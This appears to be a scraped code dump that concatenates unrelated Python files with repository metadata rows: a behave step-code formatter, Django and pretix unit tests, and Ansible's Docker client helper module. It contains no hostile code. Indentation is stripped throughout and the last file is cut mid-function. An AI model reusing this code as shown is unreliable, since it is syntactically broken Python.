self.stream.write('class Context:\n pass\n')
self.stream.write('context = Context()\n\n')
# Write before_all hook
self.stream.write(self.hooks['before_all'])
self.feature_counter = 0
def feature(self, feature):
if self.feature_counter != 0:
if self.scenario_counter != 0:
self.stream.write(self.hooks['after_scenario'])
self.stream.write(self.hooks['after_feature'])
self.stream.write(self.hooks['before_feature'])
self.feature_counter += 1
self.scenario_counter = 0
self.scenario_started = False
self.current_match = None
def match(self, match):
if match:
self.current_match = match
def result(self, result):
if result.status != 'skipped':
if not self.scenario_started:
self.stream.write(self.hooks['before_scenario'])
self.scenario_counter += 1
self.scenario_started = True
self.stream.write(self.hooks['before_step'])
self._write_code_for_function(self.current_match)
self.stream.write(self.hooks['after_step'])
def eof(self):
if self.feature_counter != 0:
if self.scenario_started:
self.stream.write(self.hooks['after_scenario'])
self.stream.write(self.hooks['after_feature'])
def close(self):
self.stream.write(self.hooks['after_all'])
def _load_module(self, file_path):
# Import and parse environment.py
# This is EXTREMELY dangerous - and I'm ashamed of that
path, _ = os.path.splitext(file_path)
file_name = path.split('/')[-1]
return importlib.import_module(file_name, path)
def _get_step_imports(self, env_file_path, steps_dir_path):
files = ['features/%s' % env_file_path]
imports = []
# Make a list of files with steps
for dirpath, dirnames, filenames in os.walk('features/%s' % steps_dir_path):
for filename in [f for f in filenames if f.endswith(".py")]:
files.append(os.path.join(dirpath, filename))
for step_file in files:
# Load direct imports
try:
with open(step_file) as f:
content = f.readlines()
for line in content:
if line.startswith('from ') or line.startswith('import '):
# Skip behave/beehive step import
if line.startswith('from beehive import ') or\
line.startswith('from behave import '):
continue
imports.append(line)
except IOError:
pass
return imports
def _import_hooks(self, env_file_path):
hooks = {}
known_hooks = [
'before_all', 'after_all',
'before_feature', 'after_feature',
'before_scenario', 'after_scenario',
'before_step', 'after_step']
env_file = self._load_module(env_file_path)
funcs = [x for x in dir(env_file) if isinstance(getattr(env_file, x), types.FunctionType)]
for hook_name in known_hooks:
func_code = ''
if hook_name in funcs and hasattr(env_file, hook_name):
func = getattr(env_file, hook_name)
func_code = inspect.getsourcelines(func)[0]
# Skip function declaration and unindent
func_code = '\n' + ''.join(self._strip_ident(func_code[1:]))
hooks[hook_name] = func_code
return hooks
def _strip_ident(self, lines):
ident_size = len(re.compile('([\t ]*)').match(lines[0]).group())
new_lines = []
for line in lines:
new_lines.append(line[ident_size:])
return new_lines
def _write_code_for_function(self, match):
self.stream.write('\n')
func_lines = inspect.getsourcelines(match.func)[0]
# Print func decorator
if func_lines[0].startswith('@'):
self.stream.write('# %s' % func_lines[0])
# Print func arguments first
for arg in match.arguments:
self.stream.write("%s = '%s'\n" % (arg.name, arg.value))
# Strip decorator, func declaration and detect identation
func_lines = self._strip_ident(func_lines[2:])
[self.stream.write(line) for line in func_lines]
# Unset arguments
for arg in match.arguments:
self.stream.write("del %s" % arg.name)
self.stream.write('\n')
| bsd-2-clause | 2,825,924,656,878,789,600 | 33.6 | 98 | 0.563945 | false |
dvliman/jaikuengine | .google_appengine/lib/django-1.2/tests/modeltests/unmanaged_models/tests.py | 43 | 2187 | from django.test import TestCase
from django.db import connection
from models import Unmanaged1, Unmanaged2, Managed1
from models import A01, A02, B01, B02, C01, C02
class SimpleTests(TestCase):
def test_simple(self):
"""
The main test here is that the all the models can be created without
any database errors. We can also do some more simple insertion and
lookup tests whilst we're here to show that the second of models do
refer to the tables from the first set.
"""
# Insert some data into one set of models.
a = A01.objects.create(f_a="foo", f_b=42)
B01.objects.create(fk_a=a, f_a="fred", f_b=1729)
c = C01.objects.create(f_a="barney", f_b=1)
c.mm_a = [a]
# ... and pull it out via the other set.
a2 = A02.objects.all()[0]
self.assertTrue(isinstance(a2, A02))
self.assertEqual(a2.f_a, "foo")
b2 = B02.objects.all()[0]
self.assertTrue(isinstance(b2, B02))
self.assertEqual(b2.f_a, "fred")
self.assertTrue(isinstance(b2.fk_a, A02))
self.assertEqual(b2.fk_a.f_a, "foo")
self.assertEqual(list(C02.objects.filter(f_a=None)), [])
resp = list(C02.objects.filter(mm_a=a.id))
self.assertEqual(len(resp), 1)
self.assertTrue(isinstance(resp[0], C02))
self.assertEqual(resp[0].f_a, 'barney')
class ManyToManyUnmanagedTests(TestCase):
def test_many_to_many_between_unmanaged(self):
"""
The intermediary table between two unmanaged models should not be created.
"""
table = Unmanaged2._meta.get_field('mm').m2m_db_table()
tables = connection.introspection.table_names()
self.assert_(table not in tables, "Table '%s' should not exist, but it does." % table)
def test_many_to_many_between_unmanaged_and_managed(self):
"""
An intermediary table between a managed and an unmanaged model should be created.
"""
table = Managed1._meta.get_field('mm').m2m_db_table()
tables = connection.introspection.table_names()
self.assert_(table in tables, "Table '%s' does not exist." % table)
| apache-2.0 | -5,822,228,236,947,279,000 | 36.706897 | 94 | 0.629172 | false |
akuks/pretix | src/tests/base/test_i18n.py | 3 | 3926 | from django.test import TestCase
from django.utils import translation
from django.utils.timezone import now
from pretix.base.i18n import LazyI18nString
from pretix.base.models import Event, ItemCategory, Organizer
class I18nStringTest(TestCase):
"""
This test case tests the LazyI18nString class
"""
def test_explicit_translation(self):
data = {
'de': 'Hallo',
'en': 'Hello'
}
s = LazyI18nString(data)
translation.activate('en')
self.assertEqual(str(s), 'Hello')
translation.activate('de')
self.assertEqual(str(s), 'Hallo')
def test_similar_translations(self):
data = {
'en': 'You',
'de': 'Sie',
'de-informal': 'Du'
}
s = LazyI18nString(data)
translation.activate('de')
self.assertEqual(str(s), 'Sie')
translation.activate('de-informal')
self.assertEqual(str(s), 'Du')
data = {
'en': 'You',
'de-informal': 'Du'
}
s = LazyI18nString(data)
translation.activate('de')
self.assertEqual(str(s), 'Du')
translation.activate('de-informal')
self.assertEqual(str(s), 'Du')
data = {
'en': 'You',
'de': 'Sie'
}
s = LazyI18nString(data)
translation.activate('de')
self.assertEqual(str(s), 'Sie')
translation.activate('de-informal')
self.assertEqual(str(s), 'Sie')
def test_missing_default_translation(self):
data = {
'de': 'Hallo',
}
s = LazyI18nString(data)
translation.activate('en')
self.assertEqual(str(s), 'Hallo')
translation.activate('de')
self.assertEqual(str(s), 'Hallo')
def test_missing_translation(self):
data = {
'en': 'Hello',
}
s = LazyI18nString(data)
translation.activate('en')
self.assertEqual(str(s), 'Hello')
translation.activate('de')
self.assertEqual(str(s), 'Hello')
def test_legacy_string(self):
s = LazyI18nString("Hello")
translation.activate('en')
self.assertEqual(str(s), 'Hello')
translation.activate('de')
self.assertEqual(str(s), 'Hello')
def test_none(self):
s = LazyI18nString(None)
self.assertEqual(str(s), "")
s = LazyI18nString("")
self.assertEqual(str(s), "")
class I18nFieldTest(TestCase):
"""
This test case tests the I18n*Field classes
"""
@classmethod
def setUpTestData(cls):
o = Organizer.objects.create(name='Dummy', slug='dummy')
cls.event = Event.objects.create(
organizer=o, name='Dummy', slug='dummy',
date_from=now(),
)
def test_save_load_cycle_plain_string(self):
obj = ItemCategory.objects.create(event=self.event, name="Hello")
obj = ItemCategory.objects.get(id=obj.id)
self.assertIsInstance(obj.name, LazyI18nString)
translation.activate('en')
self.assertEqual(str(obj.name), "Hello")
translation.activate('de')
self.assertEqual(str(obj.name), "Hello")
def test_save_load_cycle_i18n_string(self):
obj = ItemCategory.objects.create(event=self.event,
name=LazyI18nString(
{
'de': 'Hallo',
'en': 'Hello'
}
))
obj = ItemCategory.objects.get(id=obj.id)
self.assertIsInstance(obj.name, LazyI18nString)
translation.activate('en')
self.assertEqual(str(obj.name), "Hello")
translation.activate('de')
self.assertEqual(str(obj.name), "Hallo")
| apache-2.0 | -6,858,432,299,231,836,000 | 30.408 | 73 | 0.534641 | false |
thaumos/ansible | lib/ansible/module_utils/docker/common.py | 8 | 39414 | #
# Copyright 2016 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import os
import re
from datetime import timedelta
from distutils.version import LooseVersion
from ansible.module_utils.basic import AnsibleModule, env_fallback
from ansible.module_utils.common._collections_compat import Mapping, Sequence
from ansible.module_utils.six import string_types
from ansible.module_utils.six.moves.urllib.parse import urlparse
from ansible.module_utils.parsing.convert_bool import BOOLEANS_TRUE, BOOLEANS_FALSE
HAS_DOCKER_PY = True
HAS_DOCKER_PY_2 = False
HAS_DOCKER_PY_3 = False
HAS_DOCKER_ERROR = None
try:
from requests.exceptions import SSLError
from docker import __version__ as docker_version
from docker.errors import APIError, NotFound, TLSParameterError
from docker.tls import TLSConfig
from docker import auth
if LooseVersion(docker_version) >= LooseVersion('3.0.0'):
HAS_DOCKER_PY_3 = True
from docker import APIClient as Client
elif LooseVersion(docker_version) >= LooseVersion('2.0.0'):
HAS_DOCKER_PY_2 = True
from docker import APIClient as Client
else:
from docker import Client
except ImportError as exc:
HAS_DOCKER_ERROR = str(exc)
HAS_DOCKER_PY = False
# The next 2 imports ``docker.models`` and ``docker.ssladapter`` are used
# to ensure the user does not have both ``docker`` and ``docker-py`` modules
# installed, as they utilize the same namespace are are incompatible
try:
# docker (Docker SDK for Python >= 2.0.0)
import docker.models # noqa: F401
HAS_DOCKER_MODELS = True
except ImportError:
HAS_DOCKER_MODELS = False
try:
# docker-py (Docker SDK for Python < 2.0.0)
import docker.ssladapter # noqa: F401
HAS_DOCKER_SSLADAPTER = True
except ImportError:
HAS_DOCKER_SSLADAPTER = False
DEFAULT_DOCKER_HOST = 'unix://var/run/docker.sock'
DEFAULT_TLS = False
DEFAULT_TLS_VERIFY = False
DEFAULT_TLS_HOSTNAME = 'localhost'
MIN_DOCKER_VERSION = "1.8.0"
DEFAULT_TIMEOUT_SECONDS = 60
DOCKER_COMMON_ARGS = dict(
docker_host=dict(type='str', default=DEFAULT_DOCKER_HOST, fallback=(env_fallback, ['DOCKER_HOST']), aliases=['docker_url']),
tls_hostname=dict(type='str', default=DEFAULT_TLS_HOSTNAME, fallback=(env_fallback, ['DOCKER_TLS_HOSTNAME'])),
api_version=dict(type='str', default='auto', fallback=(env_fallback, ['DOCKER_API_VERSION']), aliases=['docker_api_version']),
timeout=dict(type='int', default=DEFAULT_TIMEOUT_SECONDS, fallback=(env_fallback, ['DOCKER_TIMEOUT'])),
ca_cert=dict(type='path', aliases=['tls_ca_cert', 'cacert_path']),
client_cert=dict(type='path', aliases=['tls_client_cert', 'cert_path']),
client_key=dict(type='path', aliases=['tls_client_key', 'key_path']),
ssl_version=dict(type='str', fallback=(env_fallback, ['DOCKER_SSL_VERSION'])),
tls=dict(type='bool', default=DEFAULT_TLS, fallback=(env_fallback, ['DOCKER_TLS'])),
validate_certs=dict(type='bool', default=DEFAULT_TLS_VERIFY, fallback=(env_fallback, ['DOCKER_TLS_VERIFY']), aliases=['tls_verify']),
debug=dict(type='bool', default=False)
)
DOCKER_MUTUALLY_EXCLUSIVE = []
DOCKER_REQUIRED_TOGETHER = [
['client_cert', 'client_key']
]
DEFAULT_DOCKER_REGISTRY = 'https://index.docker.io/v1/'
EMAIL_REGEX = r'[^@]+@[^@]+\.[^@]+'
BYTE_SUFFIXES = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
if not HAS_DOCKER_PY:
docker_version = None
# No Docker SDK for Python. Create a place holder client to allow
# instantiation of AnsibleModule and proper error handing
class Client(object): # noqa: F811
def __init__(self, **kwargs):
pass
class APIError(Exception): # noqa: F811
pass
class NotFound(Exception): # noqa: F811
pass
def is_image_name_id(name):
"""Checks whether the given image name is in fact an image ID (hash)."""
if re.match('^sha256:[0-9a-fA-F]{64}$', name):
return True
return False
def sanitize_result(data):
"""Sanitize data object for return to Ansible.
When the data object contains types such as docker.types.containers.HostConfig,
Ansible will fail when these are returned via exit_json or fail_json.
HostConfig is derived from dict, but its constructor requires additional
arguments. This function sanitizes data structures by recursively converting
everything derived from dict to dict and everything derived from list (and tuple)
to a list.
"""
if isinstance(data, dict):
return dict((k, sanitize_result(v)) for k, v in data.items())
elif isinstance(data, (list, tuple)):
return [sanitize_result(v) for v in data]
else:
return data
class DockerBaseClass(object):
def __init__(self):
self.debug = False
def log(self, msg, pretty_print=False):
pass
# if self.debug:
# log_file = open('docker.log', 'a')
# if pretty_print:
# log_file.write(json.dumps(msg, sort_keys=True, indent=4, separators=(',', ': ')))
# log_file.write(u'\n')
# else:
# log_file.write(msg + u'\n')
def update_tls_hostname(result):
if result['tls_hostname'] is None:
# get default machine name from the url
parsed_url = urlparse(result['docker_host'])
if ':' in parsed_url.netloc:
result['tls_hostname'] = parsed_url.netloc[:parsed_url.netloc.rindex(':')]
else:
result['tls_hostname'] = parsed_url
def _get_tls_config(fail_function, **kwargs):
try:
tls_config = TLSConfig(**kwargs)
return tls_config
except TLSParameterError as exc:
fail_function("TLS config error: %s" % exc)
def get_connect_params(auth, fail_function):
if auth['tls'] or auth['tls_verify']:
auth['docker_host'] = auth['docker_host'].replace('tcp://', 'https://')
if auth['tls_verify'] and auth['cert_path'] and auth['key_path']:
# TLS with certs and host verification
if auth['cacert_path']:
tls_config = _get_tls_config(client_cert=(auth['cert_path'], auth['key_path']),
ca_cert=auth['cacert_path'],
verify=True,
assert_hostname=auth['tls_hostname'],
ssl_version=auth['ssl_version'],
fail_function=fail_function)
else:
tls_config = _get_tls_config(client_cert=(auth['cert_path'], auth['key_path']),
verify=True,
assert_hostname=auth['tls_hostname'],
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
if auth['tls_verify'] and auth['cacert_path']:
# TLS with cacert only
tls_config = _get_tls_config(ca_cert=auth['cacert_path'],
assert_hostname=auth['tls_hostname'],
verify=True,
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
if auth['tls_verify']:
# TLS with verify and no certs
tls_config = _get_tls_config(verify=True,
assert_hostname=auth['tls_hostname'],
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
if auth['tls'] and auth['cert_path'] and auth['key_path']:
# TLS with certs and no host verification
tls_config = _get_tls_config(client_cert=(auth['cert_path'], auth['key_path']),
verify=False,
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
if auth['tls']:
# TLS with no certs and not host verification
tls_config = _get_tls_config(verify=False,
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
# No TLS
return dict(base_url=auth['docker_host'],
version=auth['api_version'],
timeout=auth['timeout'])
DOCKERPYUPGRADE_SWITCH_TO_DOCKER = "Try `pip uninstall docker-py` followed by `pip install docker`."
DOCKERPYUPGRADE_UPGRADE_DOCKER = "Use `pip install --upgrade docker` to upgrade."
DOCKERPYUPGRADE_RECOMMEND_DOCKER = ("Use `pip install --upgrade docker-py` to upgrade. "
"Hint: if you do not need Python 2.6 support, try "
"`pip uninstall docker-py` instead followed by `pip install docker`.")
class AnsibleDockerClient(Client):
def __init__(self, argument_spec=None, supports_check_mode=False, mutually_exclusive=None,
required_together=None, required_if=None, min_docker_version=MIN_DOCKER_VERSION,
min_docker_api_version=None, option_minimal_versions=None,
option_minimal_versions_ignore_params=None, fail_results=None):
# Modules can put information in here which will always be returned
# in case client.fail() is called.
self.fail_results = fail_results or {}
merged_arg_spec = dict()
merged_arg_spec.update(DOCKER_COMMON_ARGS)
if argument_spec:
merged_arg_spec.update(argument_spec)
self.arg_spec = merged_arg_spec
mutually_exclusive_params = []
mutually_exclusive_params += DOCKER_MUTUALLY_EXCLUSIVE
if mutually_exclusive:
mutually_exclusive_params += mutually_exclusive
required_together_params = []
required_together_params += DOCKER_REQUIRED_TOGETHER
if required_together:
required_together_params += required_together
self.module = AnsibleModule(
argument_spec=merged_arg_spec,
supports_check_mode=supports_check_mode,
mutually_exclusive=mutually_exclusive_params,
required_together=required_together_params,
required_if=required_if)
NEEDS_DOCKER_PY2 = (LooseVersion(min_docker_version) >= LooseVersion('2.0.0'))
self.docker_py_version = LooseVersion(docker_version)
if HAS_DOCKER_MODELS and HAS_DOCKER_SSLADAPTER:
self.fail("Cannot have both the docker-py and docker python modules (old and new version of Docker "
"SDK for Python) installed together as they use the same namespace and cause a corrupt "
"installation. Please uninstall both packages, and re-install only the docker-py or docker "
"python module. It is recommended to install the docker module if no support for Python 2.6 "
"is required. Please note that simply uninstalling one of the modules can leave the other "
"module in a broken state.")
if not HAS_DOCKER_PY:
if NEEDS_DOCKER_PY2:
msg = "Failed to import docker (Docker SDK for Python) - %s. Try `pip install docker`."
else:
msg = "Failed to import docker or docker-py (Docker SDK for Python) - %s. Try `pip install docker` or `pip install docker-py` (Python 2.6)."
self.fail(msg % HAS_DOCKER_ERROR)
if self.docker_py_version < LooseVersion(min_docker_version):
msg = "Error: Docker SDK for Python version is %s. Minimum version required is %s. "
if not NEEDS_DOCKER_PY2:
# The minimal required version is < 2.0 (and the current version as well).
# Advertise docker (instead of docker-py) for non-Python-2.6 users.
msg += DOCKERPYUPGRADE_RECOMMEND_DOCKER
elif docker_version < LooseVersion('2.0'):
msg += DOCKERPYUPGRADE_SWITCH_TO_DOCKER
else:
msg += DOCKERPYUPGRADE_UPGRADE_DOCKER
self.fail(msg % (docker_version, min_docker_version))
self.debug = self.module.params.get('debug')
self.check_mode = self.module.check_mode
self._connect_params = get_connect_params(self.auth_params, fail_function=self.fail)
try:
super(AnsibleDockerClient, self).__init__(**self._connect_params)
except APIError as exc:
self.fail("Docker API error: %s" % exc)
except Exception as exc:
self.fail("Error connecting: %s" % exc)
if min_docker_api_version is not None:
self.docker_api_version_str = self.version()['ApiVersion']
self.docker_api_version = LooseVersion(self.docker_api_version_str)
if self.docker_api_version < LooseVersion(min_docker_api_version):
self.fail('Docker API version is %s. Minimum version required is %s.' % (self.docker_api_version_str, min_docker_api_version))
if option_minimal_versions is not None:
self._get_minimal_versions(option_minimal_versions, option_minimal_versions_ignore_params)
def log(self, msg, pretty_print=False):
pass
# if self.debug:
# log_file = open('docker.log', 'a')
# if pretty_print:
# log_file.write(json.dumps(msg, sort_keys=True, indent=4, separators=(',', ': ')))
# log_file.write(u'\n')
# else:
# log_file.write(msg + u'\n')
def fail(self, msg, **kwargs):
self.fail_results.update(kwargs)
self.module.fail_json(msg=msg, **sanitize_result(self.fail_results))
@staticmethod
def _get_value(param_name, param_value, env_variable, default_value):
if param_value is not None:
# take module parameter value
if param_value in BOOLEANS_TRUE:
return True
if param_value in BOOLEANS_FALSE:
return False
return param_value
if env_variable is not None:
env_value = os.environ.get(env_variable)
if env_value is not None:
# take the env variable value
if param_name == 'cert_path':
return os.path.join(env_value, 'cert.pem')
if param_name == 'cacert_path':
return os.path.join(env_value, 'ca.pem')
if param_name == 'key_path':
return os.path.join(env_value, 'key.pem')
if env_value in BOOLEANS_TRUE:
return True
if env_value in BOOLEANS_FALSE:
return False
return env_value
# take the default
return default_value
@property
def auth_params(self):
# Get authentication credentials.
# Precedence: module parameters-> environment variables-> defaults.
self.log('Getting credentials')
params = dict()
for key in DOCKER_COMMON_ARGS:
params[key] = self.module.params.get(key)
if self.module.params.get('use_tls'):
# support use_tls option in docker_image.py. This will be deprecated.
use_tls = self.module.params.get('use_tls')
if use_tls == 'encrypt':
params['tls'] = True
if use_tls == 'verify':
params['validate_certs'] = True
result = dict(
docker_host=self._get_value('docker_host', params['docker_host'], 'DOCKER_HOST',
DEFAULT_DOCKER_HOST),
tls_hostname=self._get_value('tls_hostname', params['tls_hostname'],
'DOCKER_TLS_HOSTNAME', DEFAULT_TLS_HOSTNAME),
api_version=self._get_value('api_version', params['api_version'], 'DOCKER_API_VERSION',
'auto'),
cacert_path=self._get_value('cacert_path', params['ca_cert'], 'DOCKER_CERT_PATH', None),
cert_path=self._get_value('cert_path', params['client_cert'], 'DOCKER_CERT_PATH', None),
key_path=self._get_value('key_path', params['client_key'], 'DOCKER_CERT_PATH', None),
ssl_version=self._get_value('ssl_version', params['ssl_version'], 'DOCKER_SSL_VERSION', None),
tls=self._get_value('tls', params['tls'], 'DOCKER_TLS', DEFAULT_TLS),
tls_verify=self._get_value('tls_verfy', params['validate_certs'], 'DOCKER_TLS_VERIFY',
DEFAULT_TLS_VERIFY),
timeout=self._get_value('timeout', params['timeout'], 'DOCKER_TIMEOUT',
DEFAULT_TIMEOUT_SECONDS),
)
update_tls_hostname(result)
return result
def _handle_ssl_error(self, error):
match = re.match(r"hostname.*doesn\'t match (\'.*\')", str(error))
if match:
self.fail("You asked for verification that Docker daemons certificate's hostname matches %s. "
"The actual certificate's hostname is %s. Most likely you need to set DOCKER_TLS_HOSTNAME "
"or pass `tls_hostname` with a value of %s. You may also use TLS without verification by "
"setting the `tls` parameter to true."
% (self.auth_params['tls_hostname'], match.group(1), match.group(1)))
self.fail("SSL Exception: %s" % (error))
def _get_minimal_versions(self, option_minimal_versions, ignore_params=None):
self.option_minimal_versions = dict()
for option in self.module.argument_spec:
if ignore_params is not None:
if option in ignore_params:
continue
self.option_minimal_versions[option] = dict()
self.option_minimal_versions.update(option_minimal_versions)
for option, data in self.option_minimal_versions.items():
# Test whether option is supported, and store result
support_docker_py = True
support_docker_api = True
if 'docker_py_version' in data:
support_docker_py = self.docker_py_version >= LooseVersion(data['docker_py_version'])
if 'docker_api_version' in data:
support_docker_api = self.docker_api_version >= LooseVersion(data['docker_api_version'])
data['supported'] = support_docker_py and support_docker_api
# Fail if option is not supported but used
if not data['supported']:
# Test whether option is specified
if 'detect_usage' in data:
used = data['detect_usage'](self)
else:
used = self.module.params.get(option) is not None
if used and 'default' in self.module.argument_spec[option]:
used = self.module.params[option] != self.module.argument_spec[option]['default']
if used:
# If the option is used, compose error message.
if 'usage_msg' in data:
usg = data['usage_msg']
else:
usg = 'set %s option' % (option, )
if not support_docker_api:
msg = 'Docker API version is %s. Minimum version required is %s to %s.'
msg = msg % (self.docker_api_version_str, data['docker_api_version'], usg)
elif not support_docker_py:
msg = "Docker SDK for Python version is %s. Minimum version required is %s to %s. "
if LooseVersion(data['docker_py_version']) < LooseVersion('2.0.0'):
msg += DOCKERPYUPGRADE_RECOMMEND_DOCKER
elif self.docker_py_version < LooseVersion('2.0.0'):
msg += DOCKERPYUPGRADE_SWITCH_TO_DOCKER
else:
msg += DOCKERPYUPGRADE_UPGRADE_DOCKER
msg = msg % (docker_version, data['docker_py_version'], usg)
else:
# should not happen
msg = 'Cannot %s with your configuration.' % (usg, )
self.fail(msg)
def get_container(self, name=None):
'''
Lookup a container and return the inspection results.
'''
if name is None:
return None
search_name = name
if not name.startswith('/'):
search_name = '/' + name
result = None
try:
for container in self.containers(all=True):
self.log("testing container: %s" % (container['Names']))
if isinstance(container['Names'], list) and search_name in container['Names']:
result = container
break
if container['Id'].startswith(name):
result = container
break
if container['Id'] == name:
result = container
break
except SSLError as exc:
self._handle_ssl_error(exc)
except Exception as exc:
self.fail("Error retrieving container list: %s" % exc)
if result is not None:
try:
self.log("Inspecting container Id %s" % result['Id'])
result = self.inspect_container(container=result['Id'])
self.log("Completed container inspection")
except NotFound as dummy:
return None
except Exception as exc:
self.fail("Error inspecting container: %s" % exc)
return result
def get_network(self, name=None, id=None):
'''
Lookup a network and return the inspection results.
'''
if name is None and id is None:
return None
result = None
if id is None:
try:
for network in self.networks():
self.log("testing network: %s" % (network['Name']))
if name == network['Name']:
result = network
break
if network['Id'].startswith(name):
result = network
break
except SSLError as exc:
self._handle_ssl_error(exc)
except Exception as exc:
self.fail("Error retrieving network list: %s" % exc)
if result is not None:
id = result['Id']
if id is not None:
try:
self.log("Inspecting network Id %s" % id)
result = self.inspect_network(id)
self.log("Completed network inspection")
except NotFound as dummy:
return None
except Exception as exc:
self.fail("Error inspecting network: %s" % exc)
return result
def find_image(self, name, tag):
'''
Lookup an image (by name and tag) and return the inspection results.
'''
if not name:
return None
self.log("Find image %s:%s" % (name, tag))
images = self._image_lookup(name, tag)
if len(images) == 0:
# In API <= 1.20 seeing 'docker.io/<name>' as the name of images pulled from docker hub
registry, repo_name = auth.resolve_repository_name(name)
if registry == 'docker.io':
# If docker.io is explicitly there in name, the image
# isn't found in some cases (#41509)
self.log("Check for docker.io image: %s" % repo_name)
images = self._image_lookup(repo_name, tag)
if len(images) == 0 and repo_name.startswith('library/'):
# Sometimes library/xxx images are not found
lookup = repo_name[len('library/'):]
self.log("Check for docker.io image: %s" % lookup)
images = self._image_lookup(lookup, tag)
if len(images) == 0:
# Last case: if docker.io wasn't there, it can be that
# the image wasn't found either (#15586)
lookup = "%s/%s" % (registry, repo_name)
self.log("Check for docker.io image: %s" % lookup)
images = self._image_lookup(lookup, tag)
if len(images) > 1:
self.fail("Registry returned more than one result for %s:%s" % (name, tag))
if len(images) == 1:
try:
inspection = self.inspect_image(images[0]['Id'])
except Exception as exc:
self.fail("Error inspecting image %s:%s - %s" % (name, tag, str(exc)))
return inspection
self.log("Image %s:%s not found." % (name, tag))
return None
def find_image_by_id(self, id):
'''
Lookup an image (by ID) and return the inspection results.
'''
if not id:
return None
self.log("Find image %s (by ID)" % id)
try:
inspection = self.inspect_image(id)
except Exception as exc:
self.fail("Error inspecting image ID %s - %s" % (id, str(exc)))
return inspection
def _image_lookup(self, name, tag):
'''
Including a tag in the name parameter sent to the Docker SDK for Python images method
does not work consistently. Instead, get the result set for name and manually check
if the tag exists.
'''
try:
response = self.images(name=name)
except Exception as exc:
self.fail("Error searching for image %s - %s" % (name, str(exc)))
images = response
if tag:
lookup = "%s:%s" % (name, tag)
images = []
for image in response:
tags = image.get('RepoTags')
if tags and lookup in tags:
images = [image]
break
return images
def pull_image(self, name, tag="latest"):
'''
Pull an image
'''
self.log("Pulling image %s:%s" % (name, tag))
old_tag = self.find_image(name, tag)
try:
for line in self.pull(name, tag=tag, stream=True, decode=True):
self.log(line, pretty_print=True)
if line.get('error'):
if line.get('errorDetail'):
error_detail = line.get('errorDetail')
self.fail("Error pulling %s - code: %s message: %s" % (name,
error_detail.get('code'),
error_detail.get('message')))
else:
self.fail("Error pulling %s - %s" % (name, line.get('error')))
except Exception as exc:
self.fail("Error pulling image %s:%s - %s" % (name, tag, str(exc)))
new_tag = self.find_image(name, tag)
return new_tag, old_tag == new_tag
def report_warnings(self, result, warnings_key=None):
'''
Checks result of client operation for warnings, and if present, outputs them.
warnings_key should be a list of keys used to crawl the result dictionary.
For example, if warnings_key == ['a', 'b'], the function will consider
result['a']['b'] if these keys exist. If the result is a non-empty string, it
will be reported as a warning. If the result is a list, every entry will be
reported as a warning.
In most cases (if warnings are returned at all), warnings_key should be
['Warnings'] or ['Warning']. The default value (if not specified) is ['Warnings'].
'''
if warnings_key is None:
warnings_key = ['Warnings']
for key in warnings_key:
if not isinstance(result, Mapping):
return
result = result.get(key)
if isinstance(result, Sequence):
for warning in result:
self.module.warn('Docker warning: {0}'.format(warning))
elif isinstance(result, string_types) and result:
self.module.warn('Docker warning: {0}'.format(result))
def inspect_distribution(self, image):
'''
Get image digest by directly calling the Docker API when running Docker SDK < 4.0.0
since prior versions did not support accessing private repositories.
'''
if self.docker_py_version < LooseVersion('4.0.0'):
registry = auth.resolve_repository_name(image)[0]
header = auth.get_config_header(self, registry)
if header:
return self._result(self._get(
self._url('/distribution/{0}/json', image),
headers={'X-Registry-Auth': header}
), json=True)
return super(AnsibleDockerClient, self).inspect_distribution(image)
def compare_dict_allow_more_present(av, bv):
'''
Compare two dictionaries for whether every entry of the first is in the second.
'''
for key, value in av.items():
if key not in bv:
return False
if bv[key] != value:
return False
return True
def compare_generic(a, b, method, type):
'''
Compare values a and b as described by method and type.
Returns ``True`` if the values compare equal, and ``False`` if not.
``a`` is usually the module's parameter, while ``b`` is a property
of the current object. ``a`` must not be ``None`` (except for
``type == 'value'``).
Valid values for ``method`` are:
- ``ignore`` (always compare as equal);
- ``strict`` (only compare if really equal)
- ``allow_more_present`` (allow b to have elements which a does not have).
Valid values for ``type`` are:
- ``value``: for simple values (strings, numbers, ...);
- ``list``: for ``list``s or ``tuple``s where order matters;
- ``set``: for ``list``s, ``tuple``s or ``set``s where order does not
matter;
- ``set(dict)``: for ``list``s, ``tuple``s or ``sets`` where order does
not matter and which contain ``dict``s; ``allow_more_present`` is used
for the ``dict``s, and these are assumed to be dictionaries of values;
- ``dict``: for dictionaries of values.
'''
if method == 'ignore':
return True
# If a or b is None:
if a is None or b is None:
# If both are None: equality
if a == b:
return True
# Otherwise, not equal for values, and equal
# if the other is empty for set/list/dict
if type == 'value':
return False
# For allow_more_present, allow a to be None
if method == 'allow_more_present' and a is None:
return True
# Otherwise, the iterable object which is not None must have length 0
return len(b if a is None else a) == 0
# Do proper comparison (both objects not None)
if type == 'value':
return a == b
elif type == 'list':
if method == 'strict':
return a == b
else:
i = 0
for v in a:
while i < len(b) and b[i] != v:
i += 1
if i == len(b):
return False
i += 1
return True
elif type == 'dict':
if method == 'strict':
return a == b
else:
return compare_dict_allow_more_present(a, b)
elif type == 'set':
set_a = set(a)
set_b = set(b)
if method == 'strict':
return set_a == set_b
else:
return set_b >= set_a
elif type == 'set(dict)':
for av in a:
found = False
for bv in b:
if compare_dict_allow_more_present(av, bv):
found = True
break
if not found:
return False
if method == 'strict':
